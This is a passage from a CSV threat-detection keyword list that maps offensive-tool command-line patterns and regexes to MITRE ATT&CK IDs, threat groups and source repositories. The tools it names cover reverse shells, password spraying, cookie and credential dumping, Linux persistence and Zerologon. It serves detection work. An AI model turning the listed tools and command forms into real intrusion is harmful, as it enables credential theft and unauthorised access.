T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","0","N/A","N/A","8","4","337","63","2024-10-01T11:22:01Z","2016-05-20T04:32:41Z","4829" "*.py -e execute-assembly -i *",".{0,1000}\.py\s\-e\sexecute\-assembly\s\-i\s.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","4830" "*.py enum -H * -U *.txt -P *.txt -*.txt*",".{0,1000}\.py\senum\s\-H\s.{0,1000}\s\-U\s.{0,1000}\.txt\s\-P\s.{0,1000}\.txt\s\-.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential 
Access","https://github.com/nyxgeek/lyncsmash","1","0","N/A","N/A","8","4","337","63","2024-10-01T11:22:01Z","2016-05-20T04:32:41Z","4831" "*.py -f *.exe -e -m 4",".{0,1000}\.py\s\-f\s.{0,1000}\.exe\s\-e\s\-m\s4","offensive_tool_keyword","frampton","PE Binary Shellcode Injector - Automated code cave discovery. shellcode injection - ASLR bypass - x86/x64 compatible","T1055 - T1548.002 - T1129 - T1001","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","Exploitation tool","https://github.com/ins1gn1a/Frampton","1","0","N/A","N/A","N/A","1","75","19","2019-11-24T22:34:48Z","2019-10-29T00:22:14Z","4832" "*.py --file *.ps1 --server amsi*",".{0,1000}\.py\s\-\-file\s.{0,1000}\.ps1\s\-\-server\samsi.{0,1000}","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by an Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","N/A","9","5","465","55","2025-02-26T08:12:03Z","2022-05-19T12:12:34Z","4833" "*.py --host * --type ntlm --output *.lnk*",".{0,1000}\.py\s\-\-host\s.{0,1000}\s\-\-type\sntlm\s\-\-output\s.{0,1000}\.lnk.{0,1000}","offensive_tool_keyword","LNKUp","Generates malicious LNK file payloads for data exfiltration","T1023.003 - T1048 - T1041 - T1204","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Plazmaz/LNKUp","1","0","N/A","N/A","10","4","384","54","2017-08-21T22:58:13Z","2017-08-09T16:18:07Z","4834" "*.py -k * -f *.doc -o *.html*",".{0,1000}\.py\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.doc\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as resource.
along with an automatic download routine simulating a user clicking on the embedded resource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","N/A","10","5","485","119","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z","4835" "*.py lock -H * -u administrator -d *",".{0,1000}\.py\slock\s\-H\s.{0,1000}\s\-u\sadministrator\s\-d\s.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","0","N/A","N/A","8","4","337","63","2024-10-01T11:22:01Z","2016-05-20T04:32:41Z","4836" "*.py -method BOTH -dc-ip *",".{0,1000}\.py\s\-method\sBOTH\s\-dc\-ip\s.{0,1000}","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1557","TA0001 - TA0006","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","0","N/A","N/A","8","5","492","70","2024-11-19T21:11:53Z","2022-01-16T06:50:44Z","4837" "*.py -method LDAPS -dc-ip *",".{0,1000}\.py\s\-method\sLDAPS\s\-dc\-ip\s.{0,1000}","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1557","TA0001 - TA0006","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","0","N/A","N/A","8","5","492","70","2024-11-19T21:11:53Z","2022-01-16T06:50:44Z","4838" "*.py -no-pass -just-dc *",".{0,1000}\.py\s\-no\-pass\s\-just\-dc\s.{0,1000}","offensive_tool_keyword","zerologon","Zerologon CVE exploitation","T1210 - T1072","TA0008","N/A","Dispossessor","Exploitation tool","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4839" "*.py --ntuser NTUSER.DAT --usrclass
UsrClass.dat*",".{0,1000}\.py\s\-\-ntuser\sNTUSER\.DAT\s\-\-usrclass\sUsrClass\.dat.{0,1000}","offensive_tool_keyword","LocalShellExtParse","Script to parse first load time for Shell Extensions loaded by user. Also enumerates all loaded Shell Extensions that are only installed for the Current User.","T1547.009 - T1129","TA0003 - TA0007","N/A","N/A","Discovery","https://github.com/herrcore/LocalShellExtParse","1","0","N/A","N/A","9","1","20","4","2015-06-08T16:55:38Z","2015-06-05T03:23:13Z","4840" "*.py --server amsi --file *.exe*",".{0,1000}\.py\s\-\-server\samsi\s\-\-file\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by an Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","0","N/A","N/A","9","5","465","55","2025-02-26T08:12:03Z","2022-05-19T12:12:34Z","4841" "*.py spray -ep *",".{0,1000}\.py\sspray\s\-ep\s.{0,1000}","offensive_tool_keyword","Spray365","Spray365 is a password spraying tool that identifies valid credentials for Microsoft accounts (Office 365 / Azure AD).","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/MarkoH17/Spray365","1","0","N/A","N/A","N/A","4","348","58","2022-07-14T14:45:57Z","2021-11-04T18:20:39Z","4842" "*.py -t ldap://* --no-wcf-server --escalate-user *",".{0,1000}\.py\s\-t\sldap\:\/\/.{0,1000}\s\-\-no\-wcf\-server\s\-\-escalate\-user\s.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","4843" "*.py -t template.tpe -c
'calc.exe'*",".{0,1000}\.py\s\-t\stemplate\.tpe\s\-c\s\'calc\.exe\'.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","N/A","9","2","163","24","2024-06-17T16:20:10Z","2024-04-17T13:00:12Z","4844" "*.py teams --get*",".{0,1000}\.py\steams\s\-\-get.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1560.001 - T1555.003 - T1113 - T1557","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","0","N/A","N/A","7","2","132","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z","4845" "*.py teams --list*",".{0,1000}\.py\steams\s\-\-list.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1560.001 - T1555.003 - T1113 - T1557","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","0","N/A","N/A","7","2","132","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z","4846" "*.py -u * ?print-zones *",".{0,1000}\.py\s\-u\s.{0,1000}\s\?print\-zones\s.{0,1000}","offensive_tool_keyword","adidnsdump","By default any user in Active Directory can enumerate all DNS records in the Domain or Forest DNS zones. similar to a zone transfer. This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks.","T1018 - T1087 - T1201 - T1056 - T1039","TA0005 - TA0009","N/A","N/A","Discovery","https://github.com/dirkjanm/adidnsdump","1","0","N/A","N/A","N/A","10","997","118","2025-04-04T09:28:20Z","2019-04-24T17:18:46Z","4847" "*.py -use-remoteSSMethod *",".{0,1000}\.py\s\-use\-remoteSSMethod\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. 
Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","4848" "*.py --zip -c All -d * -u * --hashes 'ffffffffffffffffffffffffffffffff':* -dc *",".{0,1000}\.py\s\-\-zip\s\-c\sAll\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-\-hashes\s\'ffffffffffffffffffffffffffffffff\'\:.{0,1000}\s\-dc\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","4849" "*.py* --localtunnel *",".{0,1000}\.py.{0,1000}\s\-\-localtunnel\s.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. 
solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","N/A","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","4850" "*.py* --ngrok *",".{0,1000}\.py.{0,1000}\s\-\-ngrok\s.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","N/A","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","4851" "*.py* --payload *.ps1*",".{0,1000}\.py.{0,1000}\s\-\-payload\s.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","A simple python packer to easily bypass Windows Defender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker 
- Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Unknow101/FuckThatPacker","1","0","N/A","N/A","10","10","637","84","2022-04-03T18:20:01Z","2020-08-13T07:26:07Z","4852" "*.py* service -action create -service-name *",".{0,1000}\.py.{0,1000}\sservice\s\-action\screate\s\-service\-name\s.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound - DEV-0270 - MUSTANG PANDA","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","10","10","1070","134","2024-11-23T12:19:10Z","2023-04-04T06:24:07Z","4853" "*.py* -service-name * -hashes *",".{0,1000}\.py.{0,1000}\s\-service\-name\s.{0,1000}\s\-hashes\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - 
TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","N/A","10","10","1484","248","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z","4854" "*.py*.ccache *.kirbi *",".{0,1000}\.py.{0,1000}\.ccache\s.{0,1000}\.kirbi\s.{0,1000}","offensive_tool_keyword","ticket_converter","A little tool to convert ccache tickets into kirbi (KRB-CRED) and vice versa based on impacket.","T1558.003 - T1110.004","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/zer1t0/ticket_converter","1","0","N/A","N/A","10","2","167","31","2022-06-16T19:38:05Z","2019-05-14T04:48:19Z","4855" "*.py*.kirbi *.ccache*",".{0,1000}\.py.{0,1000}\.kirbi\s.{0,1000}\.ccache.{0,1000}","offensive_tool_keyword","ticket_converter","A little tool to convert ccache tickets into kirbi (KRB-CRED) and vice versa based on impacket.","T1558.003 - T1110.004","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/zer1t0/ticket_converter","1","0","N/A","N/A","10","2","167","31","2022-06-16T19:38:05Z","2019-05-14T04:48:19Z","4856" "*.py*found-users.txt*",".{0,1000}\.py.{0,1000}found\-users\.txt.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - 
T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","4857" "*.rar.exe*",".{0,1000}\.rar\.exe.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4858" "*.rar.iso*",".{0,1000}\.rar\.iso.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4859" "*.resources.123456.*",".{0,1000}\.resources\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik 
Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4868" "*.reverst.tunnel:*",".{0,1000}\.reverst\.tunnel\:.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","N/A","N/A","10","10","953","39","2025-04-16T22:33:32Z","2024-04-03T13:32:11Z","4869" "*.revshells.com*",".{0,1000}\.revshells\.com.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","4870" "*.rtf.bat*",".{0,1000}\.rtf\.bat.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4873" "*.rtf.dll*",".{0,1000}\.rtf\.dll.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4874" "*.rtf.exe*",".{0,1000}\.rtf\.exe.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - 
TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4875" "*.rtf.htm*",".{0,1000}\.rtf\.htm.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4876" "*.rtf.jar*",".{0,1000}\.rtf\.jar.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4877" "*.rtf.js*",".{0,1000}\.rtf\.js.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4878" "*.rtf.sfx*",".{0,1000}\.rtf\.sfx.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4879" "*.rtf.vbs*",".{0,1000}\.rtf\.vbs.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4880" "*.sccmhunter*",".{0,1000}\.sccmhunter.{0,1000}","offensive_tool_keyword","sccmhunter","SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain","T1087 - T1046 - T1484","TA0003 - TA0006 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/garrettfoster13/sccmhunter","1","0","N/A","N/A","9","8","750","97","2025-04-03T15:58:02Z","2023-02-20T14:09:42Z","4881" "*.search.123456.*",".{0,1000}\.search\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike 
Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4882" "*.secure.123456.*",".{0,1000}\.secure\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - 
T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4883" "*.sh *--checksec*",".{0,1000}\.sh\s.{0,1000}\-\-checksec.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","4886" "*.sh *cvelist-file:*",".{0,1000}\.sh\s.{0,1000}cvelist\-file\:.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing 
tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","#linux","N/A","10","10","5909","1133","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z","4887" "*.sh --at --custom --command * --time *",".{0,1000}\.sh\s\-\-at\s\-\-custom\s\-\-command\s.{0,1000}\s\-\-time\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","4888" "*.sh --authorized-keys --custom --key *.ssh/authorized_keys*",".{0,1000}\.sh\s\-\-authorized\-keys\s\-\-custom\s\-\-key\s.{0,1000}\.ssh\/authorized_keys.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - T1136.001 - T1546.001 - T1078.003 - T1564.001 - T1053 - T1003.008 - T1543.002 - T1053.002 - T1546.012","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Aegrah/PANIX","1","0","#linux","N/A","8","7","622","68","2025-03-05T10:45:04Z","2024-05-19T12:37:40Z","4889" "*.sh --backdoor-user --username *",".{0,1000}\.sh\s\-\-backdoor\-user\s\-\-username\s.{0,1000}","offensive_tool_keyword","panix","PANIX is a highly customizable Linux persistence tool","T1068 - T1543.003 - T1546.004 - T1169 - T1059 - 